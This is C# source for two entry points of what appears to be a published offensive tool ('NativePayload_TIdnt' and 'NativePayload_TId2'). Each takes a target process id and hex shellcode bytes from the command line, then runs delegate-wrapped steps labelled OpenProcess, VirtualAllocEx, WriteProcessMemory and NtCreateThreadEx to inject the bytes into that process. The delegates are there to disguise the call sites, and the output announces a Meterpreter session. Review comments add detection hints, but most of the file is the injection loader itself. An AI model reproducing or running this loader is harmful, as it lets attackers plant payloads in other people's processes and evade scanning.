/// <summary>
/// Entry point of the NativePayload_TIdnt listing: parses a target process id and a
/// comma-separated list of hex byte values from the command line, then runs four
/// delegate-wrapped steps against that process and prints the value each step returns.
/// </summary>
/// <remarks>
/// The four steps are labelled by the program's own status output as OpenProcess,
/// VirtualAllocEx, WriteProcessMemory and NtCreateThreadEx. The delegate targets
/// (DelCLSInvoke._Step1_ .. _Step4_) are not part of this listing, so those labels are
/// the only evidence here of what each step calls.
/// NOTE(review): routing the calls through delegates changes how the call sites look in
/// source, not the cross-process operations themselves. Telemetry on cross-process handle
/// access and remote thread creation (for example Sysmon Event ID 10 and Event ID 8) is
/// the place to look for this pattern.
/// NOTE(review): both the target pid and the raw byte list arrive as command-line
/// arguments, so process-creation logging that captures the command line records them.
/// </remarks>
/// <param name="args">
/// args[0] is the target process id (decimal); args[1] is the byte list, each element
/// parsed as base-16. Neither the argument count nor any step result is validated.
/// </param>
static void Main(string[] args)
{
    // Sets the console colour, then writes one fragment of a status line.
    void Say(ConsoleColor tint, string format, params object[] values)
    {
        Console.ForegroundColor = tint;
        Console.Write(format, values);
    }

    Console.WriteLine();
    Console.ForegroundColor = ConsoleColor.DarkGray;
    Console.WriteLine("NativePayload_TIdnt , Published by Damon Mohammadbagher , May 2020");
    Console.ForegroundColor = ConsoleColor.Gray;
    Console.WriteLine("NativePayload_TIdnt Thread Injection into Target Process + C# Delegation");
    Console.WriteLine();

    // The byte list is read before the pid, so a missing second argument fails first.
    string[] hexTokens = args[1].Split(',');
    int targetPid = Convert.ToInt32(args[0]);
    byte[] Xpayload = Array.ConvertAll(hexTokens, token => Convert.ToByte(token, 16));

    Mydels1and2 openStep = new Mydels1and2(DelCLSInvoke._Step1_);
    Mydels2and3 allocStep = new Mydels2and3(DelCLSInvoke._Step2_);
    Mydels3and4 writeStep = new Mydels3and4(DelCLSInvoke._Step3_);
    Mydels4and4 threadStep = new Mydels4and4(DelCLSInvoke._Step4_);
    Console.WriteLine();

    // Step 1: returns the value later passed as the process handle (not checked for zero).
    IntPtr H = openStep(targetPid, args[1]);
    Say(ConsoleColor.DarkGray, "Step1 Delegate.Invoke(");
    Say(ConsoleColor.Cyan, "{0}", H.ToString("X8"));
    Say(ConsoleColor.DarkGray, ") Intptr Done.");
    Say(ConsoleColor.White, " [API::OpenProcess]");
    Console.WriteLine();

    // Step 2: sized by the number of parsed bytes; the result is used as the remote address.
    IntPtr HA = allocStep(H, Xpayload.Length);
    Say(ConsoleColor.DarkGray, "Step2 Delegate.Invoke(");
    Say(ConsoleColor.Cyan, "{0}", HA.ToString("X8"));
    Say(ConsoleColor.DarkGray, ") Intptr Done.");
    Say(ConsoleColor.White, " [API::VirtualAllocEx]");
    Console.WriteLine();

    // Step 3: nothing further is printed or attempted when the write step reports false.
    if (!writeStep(H, HA, Xpayload))
    {
        return;
    }

    Say(ConsoleColor.DarkGray, "Step3 Delegate.Invoke(");
    Say(ConsoleColor.Cyan, "{0}0000000", 0.ToString());
    Say(ConsoleColor.DarkGray, ") true ;D Done.");
    Say(ConsoleColor.White, " [API::WriteProcessMemory]");
    Console.WriteLine();

    // Step 4: only reached after a successful write; its return value is printed unchecked.
    IntPtr f = threadStep(H, HA);
    Say(ConsoleColor.DarkGray, "Step4 Delegate.Invoke(");
    Say(ConsoleColor.Cyan, "{0}", f.ToString("X8"));
    Say(ConsoleColor.DarkGray, ") Intptr Done.");
    Say(ConsoleColor.White, " [API::NtCreateThreadEx]");
    Console.WriteLine();

    Console.WriteLine();
    Console.ForegroundColor = ConsoleColor.Gray;
    Console.WriteLine("Bingo Meterpreter Session by Thread Injection Method + Delegations ;)");
    Console.WriteLine();
}
/// <summary>
/// Entry point of the NativePayload_TId2 listing: same argument parsing and delegate-wrapped
/// steps as the four-step variant, but with an optional pause before each step and with
/// the fourth (thread-creation) delegate commented out in the original, so the run ends
/// after the write step.
/// </summary>
/// <remarks>
/// The steps are labelled by the program's own status output as OpenProcess, VirtualAllocEx
/// and WriteProcessMemory. The delegate targets (DelCLSInvoke._Step1_ .. _Step3_) are not
/// part of this listing.
/// NOTE(review): the pause spreads the handle open, remote allocation and remote write
/// over time, so detections that correlate these events for one source/target process
/// pair should not depend on a short time window.
/// NOTE(review): the delay, target pid and raw byte list all arrive as command-line
/// arguments, so process-creation logging that captures the command line records them.
/// </remarks>
/// <param name="args">
/// args[0] is the pause in milliseconds (a value greater than zero enables it); args[1]
/// is the target process id (decimal); args[2] is the comma-separated byte list, each
/// element parsed as base-16. The byte list is only parsed when args[0] is greater than
/// zero or is exactly the string "0"; for any other value the buffer stays null and the
/// allocation step fails on Xpayload.Length.
/// </param>
static void Main(string[] args)
{
    // Sets the console colour, then writes one fragment of a status line.
    void Say(ConsoleColor tint, string format, params object[] values)
    {
        Console.ForegroundColor = tint;
        Console.Write(format, values);
    }

    Console.WriteLine();
    Console.ForegroundColor = ConsoleColor.DarkGray;
    Console.WriteLine("NativePayload_TId2 , Published by Damon Mohammadbagher , May 2020");
    Console.ForegroundColor = ConsoleColor.Gray;
    Console.WriteLine("NativePayload_TId2 Thread Injection into Target Process + C# Delegate [Step1]");
    Console.WriteLine();

    int pauseMs = Convert.ToInt32(args[0]);
    bool delay = pauseMs > 0;
    byte[] Xpayload = null;

    // Both original branches parse identically; only the delay flag differs between them.
    if (delay || args[0].ToUpper() == "0")
    {
        string[] hexTokens = args[2].Split(',');
        // The pid is converted here only so a malformed value fails before the byte list is parsed.
        Convert.ToInt32(args[1]);
        Xpayload = Array.ConvertAll(hexTokens, token => Convert.ToByte(token, 16));
    }

    Mydels1and2 openStep = new Mydels1and2(DelCLSInvoke._Step1_);
    Mydels2and3 allocStep = new Mydels2and3(DelCLSInvoke._Step2_);
    Mydels3and4 writeStep = new Mydels3and4(DelCLSInvoke._Step3_);

    if (delay)
    {
        Console.ForegroundColor = ConsoleColor.DarkGray;
        Console.WriteLine("[!] Steps will run by Delay.({0}).", args[0]);
        System.Threading.Thread.Sleep(pauseMs);
    }

    // Step 1: returns the value later passed as the process handle (not checked for zero).
    IntPtr H = openStep(Convert.ToInt32(args[1]), args[2]);
    Say(ConsoleColor.DarkGray, "Step1 Delegate.Invoke(");
    Say(ConsoleColor.Cyan, "{0}", H.ToString("X8"));
    Say(ConsoleColor.DarkGray, ") Intptr Done.");
    Say(ConsoleColor.White, " [API::OpenProcess]");
    Console.WriteLine();

    if (delay)
    {
        System.Threading.Thread.Sleep(pauseMs);
    }

    // Step 2: sized by the number of parsed bytes; throws if the byte list was never parsed.
    IntPtr HA = allocStep(H, Xpayload.Length);
    Say(ConsoleColor.DarkGray, "Step2 Delegate.Invoke(");
    Say(ConsoleColor.Cyan, "{0}", HA.ToString("X8"));
    Say(ConsoleColor.DarkGray, ") Intptr Done.");
    Say(ConsoleColor.White, " [API::VirtualAllocEx]");
    Console.WriteLine();

    if (delay)
    {
        System.Threading.Thread.Sleep(pauseMs);
    }

    // Step 3: the last step in this variant; nothing is printed when it reports false.
    if (!writeStep(H, HA, Xpayload))
    {
        return;
    }

    Say(ConsoleColor.DarkGray, "Step3 Delegate.Invoke(");
    Say(ConsoleColor.Cyan, "{0}0000000", 0.ToString());
    Say(ConsoleColor.DarkGray, ") true ;D Done.");
    Say(ConsoleColor.White, " [API::WriteProcessMemory]");
    Console.WriteLine();
}